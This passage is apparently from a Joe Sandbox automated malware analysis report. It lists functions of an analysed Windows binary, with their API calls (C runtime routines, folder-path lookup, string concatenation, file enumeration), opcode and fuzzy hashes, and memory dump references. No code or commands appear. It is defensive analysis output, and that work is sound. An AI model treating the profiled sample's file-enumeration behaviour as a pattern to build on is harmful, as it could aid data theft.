                  • Opcode ID: 7f7d693048831bbbfc23b490a0170315425cd264262626abb7229cbc8379b344
                  • Instruction ID: 2c376c45bbd73868b013323a7bb9c02a1a7912aabd1b5225ac4396669fc04cd0
                  • Opcode Fuzzy Hash: 7f7d693048831bbbfc23b490a0170315425cd264262626abb7229cbc8379b344
                  • Instruction Fuzzy Hash: 3DF03775E54208BBDF10DBB0DD99B9E77F9AB48720F10C658BA51AB2C0DA74AA018B50
                  Function 009BC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • __getptd.LIBCMT ref: 009BC74E
                    • Part of subcall function 009BBF9F: __amsg_exit.LIBCMT ref: 009BBFAF
                  • __getptd.LIBCMT ref: 009BC765
                  • __amsg_exit.LIBCMT ref: 009BC773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 009BC797
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 5bbe2dbff79b50e5bc9fb6ddd96a045a6d4f2773b3cbaa82eb7009dbfb33e351
                  • Instruction ID: 589e941d042d06aa1fb3aa0c7ad51bc8d841d89f4f9ab0438cc668739b6b151e
                  • Opcode Fuzzy Hash: 5bbe2dbff79b50e5bc9fb6ddd96a045a6d4f2773b3cbaa82eb7009dbfb33e351
                  • Instruction Fuzzy Hash: 84F0B472D047049BD721BBB89A47BED33A06F80735F244149F454B61D2CFA459409F56
                  Function 009B4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009B8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 009B4F7A
                  • lstrcat.KERNEL32(?,009C1070), ref: 009B4F97
                  • lstrcat.KERNEL32(?,015E9E78), ref: 009B4FAB
                  • lstrcat.KERNEL32(?,009C1074), ref: 009B4FBD
                    • Part of subcall function 009B4910: wsprintfA.USER32 ref: 009B492C
                    • Part of subcall function 009B4910: FindFirstFileA.KERNEL32(?,?), ref: 009B4943
                    • Part of subcall function 009B4910: StrCmpCA.SHLWAPI(?,009C0FDC), ref: 009B4971
                    • Part of subcall function 009B4910: StrCmpCA.SHLWAPI(?,009C0FE0), ref: 009B4987
                    • Part of subcall function 009B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 009B4B7D
                    • Part of subcall function 009B4910: FindClose.KERNEL32(000000FF), ref: 009B4B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: f96bb8f5e03f806d1fc0a8cb7b902e2ef7907121b9adf7b7d6e4897c18853be1
                  • Instruction ID: 9e974f3703d0987ec14098d9fdd49bda155fd0f40633201b44d53a921b63a203
                  • Opcode Fuzzy Hash: f96bb8f5e03f806d1fc0a8cb7b902e2ef7907121b9adf7b7d6e4897c18853be1
                  • Instruction Fuzzy Hash: 5621867A900208A7C754FBA0DD86FEA337CABD4700F004558B65997181EE74AAC8CBA2